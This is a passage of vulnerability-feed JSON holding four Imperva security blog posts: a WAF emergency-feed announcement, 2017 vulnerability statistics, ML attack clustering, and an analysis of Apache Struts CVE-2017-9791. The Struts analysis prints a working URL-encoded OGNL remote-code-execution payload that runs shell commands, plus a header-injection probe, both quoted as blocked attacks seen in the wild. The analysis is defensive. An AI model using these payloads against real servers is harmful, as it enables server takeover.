"https://www.imperva.com/blog/two-new-trends-make-early-breach-detection-and-prevention-a-security-imperative/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-26T20:41:18", "description": "We previously reported that the overall number of new web application vulnerabilities in 2017 showed a 212% increase from 2016\u2019s 6,615 to a whopping 14,082. This spike was due, in part, to high-profile vulnerabilities like Heartbleed, Shellshock, POODLE, Apache Struts 2 and more recently, Meltdown and Spectra.\n\nThere is, however, good news in the form of a new tool tasked with pushing mitigations for high-profile vulnerabilities like these to the SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) within a matter of hours.\n\n## Ongoing Vulnerability Protection\n\nTasking your security team with analyzing each and every vulnerability, deciding their relevance and applying the necessary mitigations is near impossible, which is why [virtual patching of your WAF](<https://www.imperva.com/blog/2017/03/deploy-instant-virtual-patching-on-securesphere-waf-with-highly-accurate-web-vulnerability-data/>) is so important. Not updating your WAF regularly is like wearing your old 80s jeans thinking you\u2019re still cool\u2026you\u2019re not. Imperva regularly releases mitigations for new vulnerabilities.\n\n> In today\u2019s tech landscape, where constantly up-leveled cyberattacks are one of the most prominent threats to corporate assets, timing is everything.\n\nOnce a [vulnerability is published](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) it\u2019s only a matter of time until attackers will exploit it. It only takes a few hours for high-quality code snippets to be published and by then, every script-kiddy has had the opportunity to run them against whomever they choose. In the case of a [2017 Apache Struts vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), for example, an official exploit was made public one day after the vulnerability was announced. Clearly, updating mitigations only once every few weeks is not enough.\n\n## The Answer: An Emergency Feed\n\nImperva has incorporated an emergency feed into our ThreatRadar subscription service as an extension of our WAF, which allows Imperva security researchers to push mitigations for high-profile vulnerabilities to the WAF in just a matter of hours. Our goal is to push mitigations via the emergency feed in no less than 24 hours from the time of the vulnerability\u2019s publication, so whether a new vulnerability hits the landscape in the middle of the night or your entire security team is on vacation, your WAF estate is protected.\n\n## So, how do we do it?\n\nTo apply mitigation through the emergency feed, a vulnerability must be remotely exploited, operational without authentication and have the potential to be highly impactful. In these cases, Imperva researchers analyze the vulnerability, understand its scope, and create the appropriate mitigation. The mitigation is then run through a wide set of Incapsula and SecureSphere customers, on real-world data, to observe its false positive rate and search for the vulnerabilities\u2019 variations. Only when our researchers are convinced that the new mitigation is stable and reliable will they push it into the emergency feed.\n\nSimply put, in just a few hours, all of Imperva\u2019s customers on Incapsula and SecureSphere WAFs are fully protected. The best part? There\u2019s no action required by your in-house security team. As soon as they\u2019re back in the office they have access to a report summarizing the nature of the vulnerability and the mitigation applied.\n\n## Included with ThreatRadar Subscription\n\nIf you\u2019re a SecureSphere customer with a [ThreatRadar](<https://www.imperva.com/products/threatradar-intelligence/>) subscription, the emergency feed is included and takes only a few clicks to enable. Incapsula customers receive this service out of the box \u2013 no registration required.\n\nFor SecureSphere customers with ThreatRadar subscription:\n\n 1. Check the **Emergency Feed** box on the customer portal to register.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/Emergency-Feed-1.png>)\n\n 1. In the Imperva SecureSphere WAF dashboard, enable the **Emergency Feed services** under the ThreatRadar tab.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/Emergency-Feed-2.png>)\n\nThat\u2019s it. The emergency feed is enabled and will begin receiving new mitigations immediately. With each content update, our researchers will remove the most recent mitigations from the emergency feed and permanently add them to your SecureSphere WAF, so your system is updated. You will be notified of updates via email.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-26T19:01:59", "type": "impervablog", "title": "Keeping Your WAF Relevant: Emergency Feed Pushes New Mitigations in Just Hours", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-04-26T19:01:59", "href": "https://www.imperva.com/blog/2018/04/keeping-waf-relevant-emergency-feed-pushes-new-mitigations-just-hours/", "id": "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-28T17:52:36", "description": "As a web application firewall provider, part of our job at Imperva is constantly monitoring new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrate it into a single repository, and assess each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide analysis of all web application vulnerabilities throughout the year, view trends and notice significant changes in the security landscape.\n\nAs we did [last year](<https://www.imperva.com/blog/2016/12/state-web-applications-vulnerabilities-2016/>), before we enter 2018, we took a look back at 2017 to understand the changes and trends in web application security over the past year.\n\nThis year we registered a record high number of web application vulnerabilities including well-known categories like [cross-site scripting](<https://www.imperva.com/app-security/threatglossary/cross-site-scripting-xss/>), but also new categories such as insecure [deserialization](<https://www.owasp.org/index.php/Deserialization_Cheat_Sheet>). In addition, the number of internet of things (IoT) vulnerabilities continued to grow and severely impact the security landscape. WordPress and PHP each continued to \u201cdominate\u201d in terms of vulnerabilities published in the content management system and server side technologies respectively. [Apache Struts vulnerabilities](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), although the framework is less popular in the market at large, had a huge effect and were claimed to be the root cause of one of the biggest security breaches in 2017.\n\n## 2017 Web Application Vulnerabilities Statistics\n\nOne of the first stats we review is quantity, meaning how many vulnerabilities were published in 2017 and how that number compares to previous years.\n\nFigure 1 shows the number of vulnerabilities on a monthly basis over the last two years. We can see that the overall number of new vulnerabilities in 2017 (14,082) increased significantly (212%) compared to 2016 (6,615). According to our data, more than 50% of web application vulnerabilities have a public exploit available to hackers. In addition, more than a third (36%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\nAs usual, cross-site scripting (Figure 2) vulnerabilities are the majority (8%) of 2017 web application vulnerabilities. In fact, their amount has doubled since 2016.\n\n_Figure 1: Number of web application vulnerabilities in 2016-2017_\n\n## OWASP Top 10 View\n\nThis year [OWASP released](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) their long awaited \u201cTop 10\u201d list, which included two new risks:\n\n### Insecure Deserialization\n\nSerialization is the process of translating data structures or object state into a format that can be stored (for example, in a file or memory buffer) or transmitted (for example, across a network connection link) and reconstructed later (deserialization). Serialization is widely used in RPC, HTTP, databases, etc.\n\nApplications and APIs may be vulnerable if they deserialize hostile or tampered objects supplied by an attacker without proper sanitization. Therefore, we thought it would be interesting to view the security vulnerabilities in light of these changes.\n\n_Figure 2: Number and type of OWASP Top 10 vulnerabilities 2014-2017_\n\nThe amount of deserialization vulnerabilities from 2016-2017 (Figure 2) increased substantially from previous years which may explain how they \u201cearned\u201d their spot in the new OWASP Top 10 list. Today, more and more applications and frameworks are using standard APIs to communicate. Some of these APIs take serialized objects and deserialize them in return, which can explain the growing trend of insecure deserialization vulnerabilities.\n\n### Insufficient Logging and Monitoring\n\nAttackers rely on the lack of monitoring and timely response to achieve their goals without being detected. We have not found any vulnerabilities published in 2017 that are directly related to this category. It will be interesting to monitor it and see if that will change next year.\n\n## The Rise of the (IoT) Machines\n\nNowadays nearly every aspect of our lives is connected to the internet and we can find smart devices everywhere\u2014in our home refrigerator, TV, lights, doors, locks and even the clothes we wear. These devices are designed to send and receive information and thus are usually connected to the internet at all times. In many cases the vendors of smart devices neglect to secure them properly or even \u201cbackdoor\u201d them on purpose in order to gain hidden access.\n\n \n_Figure 3: IoT vulnerabilities 2014-2017_\n\n2017 registered a record high of 104 IoT-related vulnerabilities (Figure 3), a huge increase relative to previous years. The rising trend in the amount of vulnerabilities can be associated with their increasing popularity in our modern lives and advances in IoT technology that make IoT devices cheaper and accessible to more people.\n\nOne of the most popular vulnerability types in IoT devices (35%) is using default or easy to guess credentials in order to gain access to the device and take control of it. Once the device is controlled by the attacker it can be used to mount any kind of attack. Earlier this year the well-known [Mirai malware used this kind of vulnerability](<https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html>) (default credentials) to spread itself through the network. Once the malware gained access to the device, it turned it into a remote-controlled bot that was used as part of huge a DDoS attack.\n\n## Content Management Systems\n\nWhen analyzing content management system (CMS) frameworks, we decided to concentrate on the four leading platforms that account for [60% of the market share](<https://w3techs.com/technologies/overview/content_management/all>)\u2014WordPress, Joomla, Drupal and Magento.\n\n_Figure 4: Number of vulnerabilities by CMS platform 2016-2017_\n\n### WordPress\n\nAs suspected, WordPress vulnerabilities continue to be the lion\u2019s share of all CMS-related vulnerabilities. In fact, WordPress vulnerabilities (418) have increased by ~400% since 2016 (Figure 4).\n\nFurther analysis of WordPress vulnerabilities showed that 75% of the 2017 vulnerabilities originated from third-party vendor plug-ins (Figure 5).\n\n_Figure 5: WordPress third party vendor vulnerabilities in 2017_\n\nThe rise in the number of vulnerabilities can be explained by the growth of WordPress (Figure 6) and because [third party plug-in](<https://www.wpwhitesecurity.com/wordpress-security/statistics-highlight-main-source-wordpress-vulnerabilities/>) code is notoriously known for its bad security.\n\n**Year** | **Number of WordPress Plug-ins** \n---|--- \n**2015** | 41,347 \n**2016** | 48,044 \n**2017** | 53,357 \n \n_Figure 6: WordPress plug-in's trend_\n\n## Server-side Technologies\n\nPHP is still the most prevalent server-side language, therefore it\u2019s expected be associated with the highest number of vulnerabilities. In 2017, 44 vulnerabilities in PHP were published (Figure 7) which is a significant decrease (-143%) from the number of PHP vulnerabilities in 2016 (107) (see Figure 7). At the end of 2015, PHP released a major version, 7.0, after almost a year and half with no updates, which can explain the growth in the number of vulnerabilities in 2016. Last year PHP released a minor version, 7.1 (December 2016), with slight changes which can explain the decrease in the number of vulnerabilities in 2017.\n\n_Figure 7: Top server-side technology vulnerabilities 2014-2017_\n\n## The Year of Apache Struts\n\nAlthough 2017 listed fewer vulnerabilities in the Apache Struts framework (Figure 8), their impact was huge as some of them included unauthenticated [remote code execution](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) (RCE) which basically means that anyone can hack and take over the server, access private information and more.\n\n_Figure 8: Apache Struts and remote code execution vulnerabilities in 2014-2017_\n\nWe have previously blogged about this [specific vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) and [multiple other Apache Struts](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) vulnerabilities in detail. They\u2019re worth checking out if you haven\u2019t already.\n\n## Predictions Toward 2018\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are a couple of possible vulnerabilities trends for 2018:\n\n * Cross-site scripting vulnerabilities will continue to lead mainly because of the rise of [cryptojacking](<https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/>) and the increasing popularity of server-side technologies that utilize JavaScript (e.g., Node.JS).\n * More authentication-related vulnerabilities from the family of \u201cdefault/guessable credentials\u201d will be discovered (especially in IoT devices) and exploited in order to herd new botnets. These botnets can be used to mount any kind of large scale attacks\u2014DDoS, brute force and more.\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a [web application firewall](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) (WAF). A WAF may be either on-premises, in the cloud or [a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>) depending on your needs and infrastructure.\n\nAs organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security [requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). A solution supported by a dedicated security team is an important requirement to add to your selection criteria. Dedicated security teams are able to push timely security updates to a WAF in order to properly defend your assets.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-28T17:20:47", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-12-28T17:20:47", "id": "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "href": "https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-20T00:15:21", "description": "In the previous blog posts in this series, we discussed the motivation for clustering attacks and the data used and how to calculate the distance between two attacks using different methods on each feature we extracted. In this final blog post, we\u2019ll discuss the clustering algorithm itself \u2013 how to use the distance we calculated to create clusters from the data. We will discuss clustering in real time when only a small amount of data can be stored in memory. Finally, we\u2019ll show some results of the algorithm based on real data from Imperva customers.\n\n## Choosing a (realtime) clustering algorithm\n\nNow we have all the basic ingredients to input into the algorithm. What\u2019s left to decide is which clustering algorithm to use. There are many algorithms to choose from that meet varying needs, for example, we\u2019ve previously written about [clustering](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) techniques used in Imperva CounterBreach.\n\nHere\u2019s where the algorithm reality punched us right in the face: the demand from our engineering team was that the **clustering is done in** **real time**. Meaning each time a new event enters the system the algorithm needs to decide on the spot how to cluster it and update the current clustering state. This had been done with minimum memory, which meant that individual events could not be stored in memory.\n\nThe more popular and well-known clustering algorithms work on a batch of data instead of a stream, i.e., their input is a static dataset. So, this real-time requirement meant we had to look for other algorithms that work in streaming mode.\n\nThere are a [couple of methods](<https://en.wikipedia.org/wiki/Data_stream_clustering>) to use to cluster a stream of data. We won\u2019t discuss these methods as they are more complex and technical, instead, we\u2019ll present the requirements of our algorithm and what was needed for them to be met.\n\n## Clustering requirements in streaming mode\n\nFirst, a clustering algorithm in streaming mode needs to make decisions in real time, meaning that the algorithm maintains in memory a current state of the clusters and each time a new event enters the system the algorithm updates the clustering state. This is done instantaneously and without storing the discrete event in memory.\n\nSecond, we need to remember that each time the algorithm was making a decision it was doing so based on partial data. That\u2019s because the algorithm only processed past data. If the algorithm were to know **all **of the events (past and future events) the decision it would make might be different. So, the algorithm must have a way to **undo decisions** it made in the past. The way the algorithm undoes its decisions is by splitting a cluster into smaller parts and merging the parts together into other clusters that are the best fit.\n\nFinally, most of the streaming clustering algorithms from academic articles work on spatial data. This means that their input are points in a Euclidean space (think of it as coordinates in an n-dimensional space). Our data is more complex, it contains URLs which are strings, IPs, geographic coordinates and other varying features. These features cannot be easily embedded into a Euclidean space, and even if they would it would make no sense to do so. So, the algorithm we needed must assume only that we can calculate the distance between two data points, and not that they are embedded into a Euclidean space.\n\nWe used a homegrown algorithm to answer these needs. Clustering in streaming mode is always a trade-off between accuracy of the results and the time and memory efficiency. We tried to find the balance so the result would be as accurate as possible storing only the minimum amount of data needed in memory while performing the least possible amount of calculations with each incoming event. See Figure 7 for the general flow of clustering in streaming mode.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/05/Clustering.png>)\n\nFigure 7: Clustering in streaming mode - clusters may change due to new events entering the system\n\nWe stored aggregated structured data in memory instead of raw events; this way we were able to split clusters, to some extent, and rearrange them as would seem most appropriate. Also, in order to process data in real time, most of the time we used a light-weight distance function that wouldn\u2019t take too much time to calculate and didn\u2019t consider all the features. We used a heavier and more accurate distance function that considered all the features only at predefined times when there were enough new events that entered the system, as we expected the clustering state might change significantly.\n\nAlso, for performance considerations, we couldn\u2019t cluster all the events from the beginning each time a new event entered the system. That\u2019s why every time a new event came in the algorithm used its current clustering state to do calculations only on the clusters that may change due to the new event. This way we significantly reduced the time it took to process each new event.\n\n## Results of the algorithm: Customer use cases\n\nFor validation of the algorithm, some of our web application firewall (WAF) customers provided us with logs containing events from their WAF. Here are three highlighted clusters which contain incidents we thought were interesting:\n\n### Nginx integer overflow\n\nCVE-2017-7529 is a vulnerability of Nginx that allows an attacker to launch an integer overflow attack using a crafted \u201crange\u201d header. We saw a cluster on a customer\u2019s WAF containing over two thousand attacks from over 100 distinct IPs over a period of three days trying to exploit this vulnerability. Over 80% of the attacks came from the US and most of the attacks seemed to use the same attack tool. Also, the attack targeted many different URLs, although it targeted only two resource extensions: PDF and CFM.\n\n### Email harvesting\n\nEmail collector robots try to scrape web applications to find email addresses. The purpose for email harvesting is mostly to collect lists of emails in order to sell them to spammers. We saw a cluster on a customer\u2019s WAF which contained over 50 distinct IPs that performed email harvesting. The source of these attacks was very distributed, from the US, Europe, South America and Asia. Most of the targets were the home page of the application. This means that after the robots were blocked at the home page they didn\u2019t proceed to scrape the rest of the site, probably moving on to try other websites which are not protected by a WAF. The same cluster was also found in more than five different web applications we analyzed indicating this is a popular attack.\n\n### Attacks on Apache Struts vulnerabilities\n\nIn [previous blog posts](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) we discussed Apache Struts vulnerabilities, and how they are very popular among attackers, especially ones from Asian countries. [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) is an Apache Struts vulnerability published on March 2017 that allows attackers to launch remote code execution attacks using a crafted \u201ccontent-type\u201d header. We saw a cluster of attacks trying to utilize this vulnerability; most of the attacks came from China and the target was very distributed, containing multiple URLs. Also, in addition to this specific vulnerability, the attackers tried to utilize other vulnerabilities of Apache Struts. This is a popular phenomenon we see in our data: attackers trying to utilize different vulnerabilities of the same system, in this case Apache Struts. The cluster appeared on over ten different web applications we analyzed, and all the clusters contained similar attributes. This indicates the popularity of Apache Struts vulnerabilities among attackers.\n\n## Conclusion\n\nClustering application attacks is a challenging task that requires a lot of research and experimentation. Throughout the process, we encountered many difficulties and made a number of decisions regarding the algorithm. Many due to real life constraints not seen in academic research. Customer applications don\u2019t live in a lab so the solutions that protect them can\u2019t either.\n\nKnowledge of the application security domain and a deep understanding of data are both \u2013 in our experience \u2013 crucial prerequisites for the design and implementation of any successful machine learning algorithm built to protect apps and the data that connects to them.\n\nLearn more about protecting apps from attacks with [Imperva SecureSphere](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) or [Imperva Incapsula](<https://www.incapsula.com/website-security/web-application-firewall.html>) Web Application Firewall.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-06-19T22:41:03", "type": "impervablog", "title": "Clustering App Attacks with Machine Learning Part 3: Algorithm Results", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-7529"], "modified": "2018-06-19T22:41:03", "id": "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "href": "https://www.imperva.com/blog/2018/06/clustering-app-attacks-with-machine-learning-part-3-algorithm-results/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-14T02:18:38", "description": "On July 7th, a new security vulnerability was published in Apache Struts 2 CVE-2017-9791 (S2-048[1]). Struts 2.3.x users with Struts 1 plugin, which includes the Showcase app, are vulnerable.\n\nOnce again, this vulnerability enables a Remote Code Execution (RCE), which is the most commonly exploited Apache Struts vulnerability. In this case, as in many other cases of RCE in Apache Struts, the attacks observed in the wild are also carried in the form of Object-Graph Navigation Language (OGNL) expressions.[2]\n\nLike the recent Struts 2 RCE [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), Imperva customers are protected against current variations of the attack using the zero-day attack detection mechanism in either SecureSphere or Incapsula. The zero-day attack detection mechanism protects against malicious traffic regardless of a specific web exploit.\n\n## The Vulnerability\n\nBased on [Apache release notes](<https://cwiki.apache.org/confluence/display/WW/S2-048>), \u201cit is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user\u201d. The message presented to the user is processed by the \u201cActionMessage\u201d routine and returned back to the user by the \u201cmessage\u201d function as follows:\n \n \n messages.add(\"msg\", new ActionMessage(**the_message**));\n\nLacking proper validation before execution, the message (the_message) processed by the server may potentially cause a remote code execution. To fulfill its execution potential, a remote entry point is required for the message. Following the route of the vulnerable code leads to this location:\n \n \n /struts2-showcase/integration/saveGangster.action\n\nPoking around the webpage reveals several inputs controlled by the user, including name, age, and description (see Figure 1):\n\n\n\n_Figure 1: Vulnerable Apache Struts application_\n\nWhen submitting the \u201cGangster\u201d data the server processes the user\u2019s input with the vulnerable \u201cActionMessage\u201d routine and returns a message to the user (see Figure 2):\n\n\n\n\n\n_Figure 2: Request to the vulnerable page and result_\n\nAs can be observed, the processed message is integrated with the user\u2019s input data (\u201c_Gangster a added\u2026_\u201d) which means now the input data can be modified to include arbitrary code execution (see Figure 3). For instance, the RCE payload can add a custom header to the response message or use an OGNL mechanism to run malicious code (see the second payload in \u201cAttacks in the Wild\u201d section):\n\n\n\n_Figure 3: Exploitation of the vulnerable application_\n\n## Imperva Zero-Day Protection\n\nAs mentioned earlier, Imperva customers are protected against this new Apache Struts vulnerability using zero-day detection mechanisms from either SecureSphere or Incapsula, which detect incoming traffic with malicious content, regardless of a specific vulnerability or exploit.\n\nThe zero-day detection technique prevents the new attack using two complementary deterrence layers:\n\n * First, since the exploit includes an arbitrary remote code to be executed, customers are protected out-of-the-box to most attack variations using a generic Remote Command Execution mitigation mechanism (see Figure 4):\n\n\n\n_Figure 4: SecureSphere blocking a generic RCE_\n\n * Then, in the second layer of defense, SecureSphere and Incapsula both detect potential OGNL expressions which are used to manipulate Java objects, and are commonly used by attackers to inject remote code in vulnerable Apache Struts servers, including in this attack (see Figure 5):\n\n__\n\n_Figure 5: SecureSphere blocking a generic OGNL-based RCE_\n\nNevertheless, to be on the safe side, a few hours following the release of this critical vulnerability our security teams published a dedicated mitigation guideline and virtually patched Imperva customers.\n\n## Attacks in the Wild\n\nAn increasing amount of attack attempts have been seen since the publication of this new Struts vulnerability, mostly as hard copy replication of PoCs published shortly after the first announcement, and refer to reconnaissance attempts to track vulnerable servers. Below are details on two common payloads seen in the wild.\n\n### Payload #1: Custom Header Insertion Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **${#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-BIGSCAN-Test','fe9a40f002fe11e7b4ef0242c0a8050\u2032)}** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nHTTP headers are easily parsed and extracted with automated scripts, therefore validating the existence of a new custom HTTP header is very straight forward for the attackers to implement and can be used as a reconnaissance request before the actual attack \u2013 i.e., the actual RCE which will take over the server.\n\nIn most cases attackers will use this kind of reconnaissance as part of a vulnerability scanning tool on predefined IPs range, facilitating bots to effectively scan a wide range of addresses. Based on our classification analysis, IPs that were registered in this attack are known to generate mostly bot traffic (~96%).\n\n### Payload #2: OGNL Expression Execution Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **%7b%28%23szgx%3d%27multipart%2fform-data%27%29.%28%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3f%28%23_memberAccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d%29.%28%23ognlUtil%3d%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3d%27echo%20891549112%27%29.%28%23iswin%3d%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3d%28%23iswin%3f%7b%27cmd.exe%27%2c%27%2fc%27%2c%23cmd%7d%3a%7b%27%2fbin%2fbash%27%2c%27-c%27%2c%23cmd%7d%29%29.%28%23p%3dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3d%23p.start%28%29%29.%28%23ros%3d%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2c%23ros%29%29.%28%23ros.close%28%29%29%7d** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nDecoding the URL\u2019s payload injected to the name parameter unveils the following RCE (see Figure 6):\n\n\n\n_Figure 6: OGNL-based RCE (URL Decoded)_\n\nThe payload in this case refers to an attempt to execute OGNL expression, as an entry point to the attack. Again, in this case it is only a reconnaissance attempt before the attack, in which the attacker echoed a random generated number \u201c89159112\u201d to match when processing the response message.\n\nIt will be interesting to monitor the trending exploits over time and to see if and how the reconnaissance trend gradually shifts to actual exploitation attempts of these servers.\n\n## Stay Protected\n\nBased on the official [advisory](<http://seclists.org/oss-sec/2017/q3/92>) this vulnerability does not affect applications using Struts 2.5.x series or applications that do not use the Struts 1 plugin. Meaning that an update is required for those who use the earlier vulnerable patches. It is also mentioned that even if the Struts 1 plugin is available while excluding certain code parts, the application is safe.\n\nAn alternative to the formal advisory, which could be costly and time consuming, is [virtual patching](<https://www.owasp.org/index.php/Virtual_Patching_Best_Practices>). Instead of leaving a web application exposed to attack while attempting to modify code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nIn addition to virtual patching, zero-day detection mechanisms such as those mentioned above protect sites by detecting and blocking new strains of attack prior to its release without any modification to systems.\n\nLearn more about protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).\n\n[1] <https://cwiki.apache.org/confluence/display/WW/S2-048>\n\n[2] <https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-07-13T19:12:31", "title": "CVE-2017-9791: Analysis of RCE in the Struts Showcase App in Struts 1 Plugin", "type": "impervablog", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 